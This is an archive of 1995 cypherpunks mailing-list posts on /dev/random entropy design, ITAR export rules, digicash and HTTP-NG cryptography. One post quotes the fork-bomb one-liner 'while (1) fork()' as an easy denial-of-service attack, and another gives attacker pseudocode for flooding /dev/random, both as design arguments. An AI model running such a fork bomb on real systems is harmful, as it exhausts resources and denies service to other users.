> SA_SAMPLE_RANDOM flag actually have the interrupt timings sampled for
> the random number generator.

(Hmm.. Thinks of ways of doing something similar. I'm not functioning too
well right now.)

> People have suggested using making it possible to select at run-time
> which interrupts to sample, instead of at compiling it into the device
> drivers.  I've generally not been convinced this is a good idea, because
> most system administrator won't likely know which irq's are good and
> which are bad for random number generation.  For example, although it
> may not be obvious, the network interrupt may not be a good choice,
> since an adversary who is monitoring the ethernet cable can make a
> pretty good guess about the timing of your network interrupts, and hence
> what the likely inputs are to the random number pool might be.

Are you sure about this? The stochastisity if this would be pretty
hefty. Not only would our attacker have to get the _time_ that the
interrupt occurred (if it interrupted our machine), he would then have
to process in brute-force mode all possible times in his error range.
What is more, more interrupts are coming in...

>    Gimme a yell if you want copies :-)
> 
> Sure, why not.   I'd be interested to see what you did.

Hokay! Please also send me _your_ latest. (BTW - did Linus put it in
his latest kernel?)

M
--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark@grumble.grondar.za for PGP key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Tue, 31 Oct 1995 11:36:57 +0800
To: Mark Murray <mark@grondar.za>
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <199510302148.XAA00832@grumble.grondar.za>
Message-ID: <VAA13893.199510310259@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <199510302148.XAA00832@grumble.grondar.za>, Mark Murray writes:
[...]
>> I don't agree that restricting read access is useful.  First of all, if
>> the pool of entropy is depleted, someone who tries to obtain entropy by
>> reading /dev/random will know that they didn't get enough entropy.  So
>> assuming a program that actually checks return values from system calls,
>> this is at worse a denial of service attack, and there are much easier
>> ways of performing those srots of attacks: "while (1) fork()", for
>> example.
>
>Hmm. Lemme think about this...

When /dev/random doesn't have "enough" enthropy left does reading
from it return an error, or block?  I would strongly suggest
blocking, as the non-blocking behavur is not really all that useful.

Either can simulate the other, but I think it comes down to:

non-blocking worst-case:
 a program calls /dev/random, doesn't get randomness, ignores
 error code, poorly protects some valuable thing, as a result
 the valuable thing gets stolen.

blocking worst-case:
 a program calls /dev/random, waits a long time to get random numbers,
 user curses the slow machine/program, valuable thing gets sent late,
 but is not stolen.

non-blocking best-case failure:
 a program calls /dev/random, doesn't get randomness, informs smart
 user, who finds the bad guy sucking all bits from /dev/random,
 has them ejected from system.

blocking best-case failure:
 same as worst-case (i.e. the worst-case is lots better, the best-case
 is worse).  This can be transformed to the non-blocking best-case 
 failure by clever programming (threads, or fork, or sigalarm), the
 people who do this are far more likely to actually try to issue a
 good error message then the people who get non-blocking by default.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 31 Oct 1995 14:41:38 +0800
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
In-Reply-To: <acb5766d09021004a512@[205.199.118.202]>
Message-ID: <3095BF32.2A72@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> At 4:43 PM 10/26/95, Jeff Weinstein wrote:
> 
> >  The ITARs are currently keeping us(Netscape) from distributing
> >our US-only products to people within the United States.  We have
> >asked for clarification from the government about network distribution,
> >such as how much verification of location and citizenship of the
> >recipient we must do, and have yet to receive a response.  That
> >makes it more than just an export issue, at least for us.
> 
> And I agree that this is a much more important issue than whether a t-shirt
> can get an OK for export or not.
> 
> If the CJR for the t-shirt is ultimately granted, what useful information
> will be derived, or what implications for Netscape's question will be
> discovered?
> 
> If the CJR for the t-shirt is ultimately denied, ditto?

  It will force the bureaucrats to make a decision, which will be
the subject to much public scrutiny.  Hopefully it will generate a
stir in the press and inform many more people of the problems of
the current system.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Theodore Ts'o" <tytso@MIT.EDU>
Date: Tue, 31 Oct 1995 11:52:56 +0800
To: "Josh M. Osborne" <stripes@va.pubnix.com>
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <VAA13893.199510310259@garotte.va.pubnix.com>
Message-ID: <9510310316.AA26268@dcl.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Mon, 30 Oct 1995 21:59:14 -0500
   From: "Josh M. Osborne" <stripes@va.pubnix.com>

   When /dev/random doesn't have "enough" enthropy left does reading
   from it return an error, or block?  I would strongly suggest
   blocking, as the non-blocking behavur is not really all that useful.

It acts like many character devices and named pipes in that if there is
no entropy available at all, it blocks.  If there is some entropy
available, but not enough, it returns what is available.  (A subsequent
read will then block, since no entropy will then be available.)

Actually, what's currently in Linux doesn't work precisely like this,
but it will soon.  After talking a number of people on both sides of the
block vs. non-blocking camp, this seemed to be a suitable compromise.
At least one Major Workstation Vendor is planning on using this behavior
for their /dev/random, to appear in a future OS release.  If we all can
standardize on this behavior, it'll make application writer's jobs that
much easier.

						- Ted




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 31 Oct 1995 12:36:02 +0800
To: cypherpunks@toad.com
Subject: Re: Cuban Security Conference
In-Reply-To: <199510301723.JAA22047@ix9.ix.netcom.com>
Message-ID: <qJgTDD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart <stewarts@ix.netcom.com> writes:
> >		International Conference Center
> >		     Pabexpo, Havana, Cuba
> >			March 4-9, 1996
> >	3rd Ibero-American Seminar on Protection against
> >    Computer Viruses and Security of Information Technologies
>
> I wonder if they'd be receptive to talks on private communications,
> digicash, tax avoidance through digital technology, anarchy and
> collapse of government power, etc. :-)

I don't know about the current situation, but back in the '80's, Cuba was
more high-tech than much of Eastern Europe.  I got an e-mail from Cuba
sent via the USSR and the Internet circa 1988; way before countries like
Poland or Romania had any sort of net.presence.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Tue, 31 Oct 1995 07:47:44 +0800
To: cypherpunks@toad.com
Subject: Re: Digicash will not fly (not)
In-Reply-To: <acb9bb9700021004f83d@[205.199.118.202]>
Message-ID: <473jfp$pll@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.SUN.3.91.951030121921.17834E-100000@tipper.oit.unc.edu>,
Simon Spero <ses@tipper.oit.unc.edu> wrote:
> One point worth noting is that the 5% cut used to be a typical fee for 
> credit-card transactions. However, that cut only happened once per 
> purchace, whereas digicash may incur this fee many more times. 

I think there are two major differences between credit cards and digicash
that affect the pricing structure.

1. Applicability

We think of eventually using digicash for everything.  You wouldn't just
use it to pay Sears for a sweater, but Sears would use it to pay for the
wool and for their taxes.  A 5% hit may be ok for the final transaction,
but it's impossible if you incur it every time money is exchanged.

Credit cards are mostly consumer items and don't have this problem as
much, and the states have invented resale licenses specifically to exempt
you from paying sales tax at every step.  I realize that digicash is being
marketed as a consumer item, but I'd like to see it eventually become a
standard banking instrument.  I certianly trust it more than I trust EFT.

2. Float

Cash schemes are unique in that while your money is in the ecash mint,
the bank has the use of it.  Don't underestimate the importance of this
in a high-volume business; if digicash were popular, the banks would
cut their margins to the point where this would probably be the major
source of revenue.  But it would be substantial.

I think digicash out to be priced comparably to traveller's checks.
That is what they are closest to.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJVRJOyjYMb1RsVfAQGMeQP/eg77ud1E1lyoWhERLkHXOawHaaUXcz/j
mZoCD4ujmkiBmOmvqCyITG9UFOKSjzJ4aA8AC81AVPhCxVLIahMLZBFb2IvANz4r
jLJraWyBNWpLk4TN/djwPcMdtMcQsAMTWB5IYeQDvp3IWS/rnIr01Zs0RiKYlE3q
7X5zuwDMujc=
=BBfH
-----END PGP SIGNATURE-----
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 31 Oct 1995 12:05:03 +0800
To: ses@tipper.oit.unc.edu
Subject: Re:  Keyed-MD5, ITAR, and HTTP-NG
Message-ID: <9510310330.AA08343@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


All your individual answers make sense.

Taken together, tho, they make HTTP-NG worrisome on the crypto front.

For example, it's probably a real bad idea to replace DES with something
commonly called RC4.  The former has been under public scrutiny for years,
the later still has not formally emerged from the shroud of trade secret.
The keyed MD5 responses also don't inspire confidence.

With all due respect, I strongly encourage you to leave crypto out of
HTTP-NG for the time being.  Wait to see what happens from the various
IPng security, SSL, S-HTTP, the W3C work, et cetera.  Leave some "holes"
in the protocol, but don't tie anything down now.  For better for the
Web to wait six to 12 months for HTTP-NG, then for mistakes to occur
in this area.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Tue, 31 Oct 1995 08:02:31 +0800
To: cypherpunks@toad.com
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <199510301925.VAA27116@grumble.grondar.za>
Message-ID: <473k3p$pt2@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199510301925.VAA27116@grumble.grondar.za>,
Mark Murray <mark@grondar.za> wrote:
> Something I didn't mention earlier; we felt that letting the unwashed
> masses read /dev/*random was not a good idea, as they could deplete
> the pool of entropy all to easily for attack purposes.

That's really just a DOS attack, isn't it?  An application that needs
true randomness should be using /dev/random, which you can slow but not
disturb, and an application that is using /dev/urandom should be ok with
less than full entropy.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJVTqeyjYMb1RsVfAQGqYwP/W6xUdsxwCMrWlvmuPrfV4yfaYpZWt3JW
/ld8HsqyQt5XRkbNwq/hcXDle13exEaqzXe2l6qHtR3qySEaU/4WF/BgSTwqpQa+
iA6p8KL51XPluNF9oagMrmOR2J4yxMPldrx5m/+WcZRJj4mdfzxQoMQ9J4agTVsC
l2spGY8iNkA=
=9cfz
-----END PGP SIGNATURE-----
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fen Labalme <fen@comedia.com>
Date: Tue, 31 Oct 1995 15:44:16 +0800
To: cypherpunks@toad.com
Subject: FWD: Electronic Warfare (from the digitaliberty list)
Message-ID: <199510310725.XAA06543@imagine.comedia.com>
MIME-Version: 1.0
Content-Type: text/plain


Interesting (if a bit mild for this list) article from another list some of
you might be interested in (or already subscribed to)....

---- Forwarded Message ----

From: owner-digitaliberty@phantom.com
Date: Tue, 31 Oct 1995 01:00:06 -0500
To: digitaliberty-digest@piltdown.phantom.com
Subject:   digitaliberty V1 #13


digitaliberty             Tuesday, 31 October 1995      Volume 01 : Number 013

In this issue:

Test
Electronic Warfare

See the end of the digest for information on subscribing to the Digitaliberty
or Digitaliberty-Digest mailing lists.

----------------------------------------------------------------------

From: Bill Frezza (via RadioMail) <frezza@radiomail.net>
Date: Mon, 30 Oct 1995 13:14:58 -0800
Subject: Test

This is a test. <sigh>

------------------------------

From: DigitaLib@aol.com
Date: Mon, 30 Oct 1995 18:02:17 -0500
Subject: Electronic Warfare

Folks,

Attached is a column that ran on the op-ed page of today's Communications
Week. I have agreed to do bi-weekly opinion pieces for them focussing on the
impact of technology on society, politics, and culture - all with a
DigitaLibertarian slant (of course). My hope is that this fiesty group can
keep me fed with grist for these pieces.

For anyone that lives in NYC, I will be carrying the DigitaLiberty banner on
a panel on digital commerce at the Multimedia Design conference at the Javits
center Friday 11/3 at 3:30pm. Stop by and say hello.

Regards,

Bill

- ---------------------------------------------------------------------------

ELECTRONIC WARFARE WAGES ON - AND YOU'RE THE TARGET

Although the flap over the Clinton administration's attempt to promote
escrowed-key encryption systems like Clipper has temporarily faded, the war
on electronic privacy continues.   As proceedings at the Fourth International
Conference on Money Laundering, Forfeiture, Asset Recovery, Offshore
Investments, the Pacific Rim, and International Financial Crimes reveal,
there has been no let up in our government's efforts to blockade the
cyber-frontier.

No, you won't learn much from the Wall Street Journal or the New York Times,
written by journalist-generalists who have no clue about where this
technology is heading.  The Feds have become so skilled at manipulating the
Old Media that stories about electronic privacy  invariably center on the
latest drug kingpin, pedophile, or domestic terrorist.  Attacking these
universally abhorred enemies of the people not only makes for good headlines
but keeps privacy advocates off balance as they are forced to defend abstract
rights using loathsome examples.  But if you tune in to the Cypherpunks
mailing list (majordomo@toad.com) you can get some excellent first hand
reports from the front.

In the relatively short period since the passage of the Bank Secrecy Act,
which, among other things, obliges banks to file Suspicious Activity Reports
on its customers, banks have become virtual deputies in the treasury
department's war on uncontrolled financial transactions.  And this war is
increasingly spilling into cyberspace.

The conference underscored the fact that, paradoxically, we are heading not
toward more specific and well defined transaction monitoring regulations, but
less.  How so?  The problem with making regulations precise is that what
software algorithms can define, other algorithms can evade.  Instead,
regulation by "raised eyebrow" is becoming the norm.  Federal bank examiners
have been given significant latitude to invoke draconian penalties against
uncooperative banks.  Because bank officers have few due-process protections
under this regime, it is no surprise that most of them have become sniveling
toadies.  The objective is to insure that banks "voluntarily" introduce even
more aggressive, unpredictable, and intrusive monitoring than the government
would ever dare mandate.  And to make sure nothing slips through the cracks,
human surveillance will be supplemented with artificial-intelligence agents
that can perform pattern analysis on the aggregate flow of electronic
transactions, flagging anything remotely suspicious.  George Orwell would be
impressed.

Lest you think that all of this is motivated solely by the drug war,  a visit
to the Treasury Department's Financial Crimes Enforcement Network (FinCEN)
homepage (http://www.ustreas.gov/treasury/bureaus/fincen/facts.html) should
open your eyes.  This battle is not just about drug prohibition, a crime the
Treasury Department would have to invent if it didn't already exist.  The
real struggle is about the future of tax compliance, and it has you in its
sights.

A famous Revolutionary War era pamphleteer, writing under the pseudonym
"Brutus", perhaps said it best 200 years ago when he wrote - "The national
government through its taxing power will introduce itself into every corner
of the city and country.  It will take cognizance of the professional man in
his office or his study;  it will watch the merchant in his store;  it will
follow the mechanic to his shop and his work, and will haunt him in his
family and his bed;  it will be the constant companion to the industrious
farmer in his labour;  it will penetrate into the most obscure cottage;  and
finally it will light upon the head of every person in the United States.  To
all these different classes of people and in all these circumstances on which
it will attend them, the language in which it will address them will be GIVE!
GIVE!"

What Brutus didn't know and what the cypherpunks foresee is that one day
strong encryption will make it impossible to spy on our activities in
cyberspace.  Heightened conflict is inevitable.  Expect the rhetoric to get a
lot hotter as the government spinmeisters labor to keep us focused on public
enemies while frantically trying to keep its hand in every citizens pocket
and its eyes on every bankbook. 

# # #
COPYRIGHT CMP PUBLICATIONS 1995

Bill Frezza is president at Wireless Computing Associates and co-founder of
the online forum DigitaLiberty.  The opinions expresses are his own. Frezza
can be reached at frezza@interramp.com.


------------------------------

End of digitaliberty V1 #13
***************************

To subscribe to Digitaliberty-Digest, send the command:

subscribe digitaliberty-digest

in the body of a message to "Majordomo@phantom.COM".  If you want
to subscribe something other than the account the mail is coming from,
such as a local redistribution list, then append that address to the
"subscribe" command; for example, to subscribe "local-digitaliberty":

subscribe digitaliberty-digest local-digitaliberty@your.domain.net

A non-digest (direct mail) version of this list is also available; to
subscribe to that instead, replace all instances of "digitaliberty-digest"
in the commands above with "digitaliberty".

---- End Forwarded Message ----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 31 Oct 1995 12:54:37 +0800
To: Rich Salz <cypherpunks@toad.com
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <9510310330.AA08343@sulphur.osf.org>
Message-ID: <9510310427.AA28252@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>For example, it's probably a real bad idea to replace DES with something
>commonly called RC4.  The former has been under public scrutiny for years,
>the later still has not formally emerged from the shroud of trade secret.
>The keyed MD5 responses also don't inspire confidence.

I disagree. Basically Simon simply has to stick in some parameters so that
the crypto alg can change with time. There should be slots for the following 
algs :-

Symmetric cipher	IDEA, RC4, 3DES
Keyed Digest		KD* (paper to follow, there are 7 to chose from).

Key exchange		Diffie-Helleman, El Gammal, RSA
Signature		RSA, El Gammal, Rabin (Shamir variation), DSS
Hash functions		MD5, SHA

I don't think that we are intending to tap Simons skill in designing 
ciphers. We have Ron Rivest and Taher El Gamal for that, plus help from
Adi Shamir and if we get stuck I'll bang on some other doors. I really don't 
think we have a problem lacking cryptographers. Simon is putting in security 
input which is different. We have an equally star studded cast for that side of 
things (and if we get stuck I'll e-mail some more characters).

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 31 Oct 1995 13:00:38 +0800
To: rsalz@osf.org
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
Message-ID: <9510310430.AA08480@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


How are you going to handle mechanism negotiation?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Murray <mark@grondar.za>
Date: Tue, 31 Oct 1995 07:36:57 +0800
To: "Theodore Ts'o" <tytso@MIT.EDU>
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
Message-ID: <199510302148.XAA00832@grumble.grondar.za>
MIME-Version: 1.0
Content-Type: text/plain


>    Something I didn't mention earlier; we felt that letting the unwashed
>    masses read /dev/*random was not a good idea, as they could deplete
>    the pool of entropy all to easily for attack purposes. 
> 
> That should be a system administration issue.  If someone wants to make
> /dev/random readable only by root at their site, that's their business.
> I don't see any point in trying to enforce that in the kernel code.

Is not in the kernel, this is just the permissions on /dev/*random.

> I don't agree that restricting read access is useful.  First of all, if
> the pool of entropy is depleted, someone who tries to obtain entropy by
> reading /dev/random will know that they didn't get enough entropy.  So
> assuming a program that actually checks return values from system calls,
> this is at worse a denial of service attack, and there are much easier
> ways of performing those srots of attacks: "while (1) fork()", for
> example.

Hmm. Lemme think about this...

> Secondly, making /dev/random only readable by "privileged programs"
> means that people won't be able to compile their own version of PGP that
> can take advantage of the random number generator.  Instead, they would
> have to use a setuid version of PGP, and I'm quite sure PGP wasn't
> written such that it would be safe to turn on its setuid bit.  

How about SetGID? We were going for 660 root.kmem.

> Finally, even if you did have trustworthy applications which you could
> setuid and only allow those programs to have access to /dev/random,
> someone who repeatedly ran those applications could still end up
> depleteing the pool of entropy.
> 
> So in the general case I would advise that /dev/random be left world
> readable, since you *do* want general user programs to have access to
> high quality random numbers.  

Ponder... I'll put this forward.

> Again, /dev/random can be set to whatever permissions the system
> administrator wants.  Secondly, writing to /dev/random merely adds
> randomness to the pool, via the mixing algorithm.  It won't actually
> permit people to *set* the state of the pool, and assuming that the
> state of the pool is not known before the write operation, writing to it
> won't allow the user to know what the state is after the write
> operation.

What happens if some attacker does:

for (;;) {
	write_to_devrandom(NULL);
	check_to_see_if_state_is_crackable();
}

? "Gut feel" suggests to me that large ammounts of "predicted" input might
be worse than the normal sort of system noise you have been using.

> And, for race condition reasons, something which I need to implement
> soon is an ioctl(), usuable only by root, that simultaneously updates
> the entropy estimate *and* submits data to be mixed into the pool.  (Why
> this is necessary should be obvious after a few minutes thought.)

Clue me in - I'm not quite with you? :-)

>    Are you sure about this? The stochastisity if this would be pretty
>    hefty. Not only would our attacker have to get the _time_ that the
>    interrupt occurred (if it interrupted our machine), he would then have
>    to process in brute-force mode all possible times in his error range.
>    What is more, more interrupts are coming in...
> 
> I didn't say that it would be trivial for an attacker to do this, but
> it's certainly *doable*.  Some of the network traffic analyzers that
> have been made available (I think Sandia National Labs has one that does
> this), records down to millisecond accuracy when a packet was sniffed on
> the network.  

Is this millisecond accuracy quantifiable in terms of bits of entropy?
if so, the ethernet is surely safe?

> For this reason, people shouldn't really trust initializing PGP's random
> number generator over a network connection, since it is possible for an
> adversary to obtain very high quality timings of when your telnet or
> rlogin packets appeared on the network, and hence be able to guess
> (within some error range) what the interkeyboard timings which PGP used
> to initialize its random number generator.
> 
> The adversary might have to try a large number of possibilities, but if
> the number of possibilities is less than a brute-force search, you
> definitely have a weakness --- a fact which Netscape learned to its
> embarassment a few weeks ago.

Again, if you can quantify the number of possibilities into bits of entropy,
your code is good. Depending on current technology, this may have to change.

M

--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark@grumble.grondar.za for PGP key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 1 Nov 1995 00:52:59 +0800
To: stewarts@ix.netcom.com>
Subject: Re: Cuban Security Conference
Message-ID: <199510310707.XAA17024@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:22 PM 10/30/95 -0500, s1113645@tesla.cc.uottawa.ca wrote:
> For that matter is civilian use of strong (or any other kind) crypto actually
> legal in Cuba? Anyone know the policies? (duh, lemme guess...)

Well everything is legal in Cuba since there are no discernable laws, only
policies, however at they time that I visited Cuba those phones available
to ordinary citizens had a phonekeeper seated right beside the phone.

On the other hand, no one would stop you setting up a data haven or
some such in Cuba, provided it was strictly off limits to Cubans, 
but you could not set up a bank, because sooner or later somebody 
quite important would help themselves to the banks assets.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <klp@gold.tc.umn.edu>
Date: Tue, 31 Oct 1995 15:05:54 +0800
To: Doug.Hughes@Eng.Auburn.EDU (Doug Hughes)
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <doug-9509302237.AA0062331@netman.eng.auburn.edu>
Message-ID: <3095c7353a43002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


According to rumor, Doug Hughes said:
> >  Since you deal with security issues maybe you can help me to learn 
> >about some issues with encryption.  I am talking with one of the 
> >administration people about putting PGP on the system for everyone to 
> >use, but there are issues for them (the admin) as they might be liable, 
> >even if they can't read the e-mail.  What other legal considerations 
> >should be evaluated?
> >  Is there any large organizations (like any other universities) that 
> >allow their students to use PGP, and have the system in place to make it 
> >easier for the students?  If it is offered here I might be the one to add 
> >to the mail program (pine) that is generally used to transparently use 
> >PGP, which is what I mean by having a system set up for the encryption. 
> >  Thanx for any help.  Take care and have fun.
> >
> >James Black
> >black@suntan.eng.usf.edu
> >
> >
> We have approx 1000 machines and 5000 user accounts and have pgp installed.
> I can't think of any reason not to have it installed, and lots of good
> reasons for having it installed.

We currently have PGP installed on our 2 central email servers that
have approximatly 20,000 users. We haven't integrated it at this
point into Pine, etc mostly due to time and resources. 

I don't know why inability to read e-mail would cause liability,
and moving 2 million messages a week, I don't think that anyone
could be expected to know what users are sending. We only respond
to complaints.

-- 
Kevin Prigge                        |  Holes in whats left of my reason, 
CIS Consultant                      |  holes in the knees of my blues,
Computer & Information Services     |  odds against me been increasin' 
email: klp@cis.umn.edu              |  but I'll pull through...  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Tue, 31 Oct 1995 15:58:12 +0800
To: cypherpunks@toad.com
Subject: Using Holographic Memory Crystals for Encryption
Message-ID: <Pine.SUN.3.90.951031013236.2277B-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain



*WARNING*
I have not idea about what Iam about to talk.
This is a midnight rant. Take it as it is.
*WARNING*

I just finished reading the article on Holographic Memories on the latest
Scientific America by Demetri Psaltis and Fai Mok. At the end they 
mention that "Given a hologram, either one of the two beams that 
interfered to create it can be used to reconstruct the other. What this 
means, in a holographic memory, is that it is possible not only to orient 
a reference beam into the crystal at a certain angle to select an 
individual holographic page but also to accomplish the reverse. 
Illuminating a crystal with one of the stored images gives rise to an 
approximation of the associated reference beam, reproduced as a plane 
wave emanating from the crystal at the appropriate angle."

	I was thinking this is simply a kind of XOR here given one image 
you can obtain the other. No this convined with the fact that you need
to know the right angle could make for some interesting stuff. You could 
make a system where you give it the initial angle and password which is 
illuminated into the cristal to reveal the encoded data add to this some 
feadback mechanism where the angle changes depending on some function of 
the data and things get interesting.

	Its late and Iam tired. But if anyone has any ideas I woulkd love 
to heard them. Good nite.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Tue, 31 Oct 1995 16:17:24 +0800
To: cypherpunks@toad.com
Subject: Digicash on Scientific American
Message-ID: <Pine.SUN.3.90.951031015937.2277C-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


Another thing before I go to bed. On the November issue of Scientific 
American the Essay column writen by Anne Eisenberg is titled "Doing 
Busioness on the Net". Its short (one page), but metions PK crypto, 
touches upon the dangers that online transcations pose to privacy, and 
talks a bit about ecash. Sadly there is no mention of ITAR *sight*

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@netscape.com (Jsw@netscape.com)
Date: Wed, 1 Nov 1995 05:36:11 +0800
To: cypherpunks@toad.com
Subject: RE: CJR RETURNED TO SENDER
Message-ID: <9510310631062323@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


From: Jeff Weinstein <jsw@netscape.com>
Subject: Re: CJR returned to sender
Date: Mon, 30 Oct 1995 22:16:18 -0800
Organization: Netscape Communications Corporation

Timothy C. May wrote:
> 
> At 4:43 PM 10/26/95, Jeff Weinstein wrote:
> 
> >  The ITARs are currently keeping us(Netscape) from distributing
> >our US-only products to people within the United States.  We have
> >asked for clarification from the government about network distribution,
> >such as how much verification of location and citizenship of the
> >recipient we must do, and have yet to receive a response.  That
> >makes it more than just an export issue, at least for us.
> 
> And I agree that this is a much more important issue than whether a t-shirt
> can get an OK for export or not.
> 
> If the CJR for the t-shirt is ultimately granted, what useful information
> will be derived, or what implications for Netscape's question will be
> discovered?
> 
> If the CJR for the t-shirt is ultimately denied, ditto?

  It will force the bureaucrats to make a decision, which will be
the subject to much public scrutiny.  Hopefully it will generate a
stir in the press and inform many more people of the problems of
the current system.

        --Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 1 Nov 1995 00:13:47 +0800
To: cypherpunks@toad.com
Subject: payee anonymity
Message-ID: <199510311535.HAA05408@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Another way payees could be anonymous would be to immediately spend their
received coins, and do so anonymously.  This works for the online ecash
system.  They simply pass the coins on without first exchanging them at
the bank.  There would have to be something they wanted to buy that they
could receive anonymously, though.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 31 Oct 1995 23:34:06 +0800
To: Jeff Weinstein <cypherpunks@toad.com
Subject: Re: CJR returned to sender
Message-ID: <199510311509.HAA23755@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:16 PM 10/30/95 -0800, Jeff Weinstein wrote:
>  It [CJR application for T shirts] will force the bureaucrats 
> to make a decision, 

You cannot force bureaucrats to make a decision.

They will act if it suits their purpose, and otherwise they
will not act.

Basic of principle of strategy in Go:  If you give the other 
guy choices, you will lose.  That is why go players always 
play asymmetrically if the stones are symmetric.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Murray <mark@grondar.za>
Date: Tue, 31 Oct 1995 14:32:45 +0800
To: "Josh M. Osborne" <stripes@va.pubnix.com>
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
Message-ID: <199510310612.IAA03091@grumble.grondar.za>
MIME-Version: 1.0
Content-Type: text/plain


> When /dev/random doesn't have "enough" enthropy left does reading
> from it return an error, or block?  I would strongly suggest
> blocking, as the non-blocking behavur is not really all that useful.

It returns EOF.

M
--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark@grumble.grondar.za for PGP key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 1 Nov 1995 02:17:21 +0800
To: cypherpunks@toad.com
Subject: ecash remailer
Message-ID: <199510311625.IAA07105@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


To provide payee anonymity:

Enterprising cypherpunk, Ed sets up the Ecash Remailer.

Alice pays Bob e$15. Alice is anonymous.
Bob sends Ed the e$15
Ed cashes the e$ into his ecash mint account, withdraws e$13.50
then pays Bob those e$14 .. Bob can now spend those e$ at will.

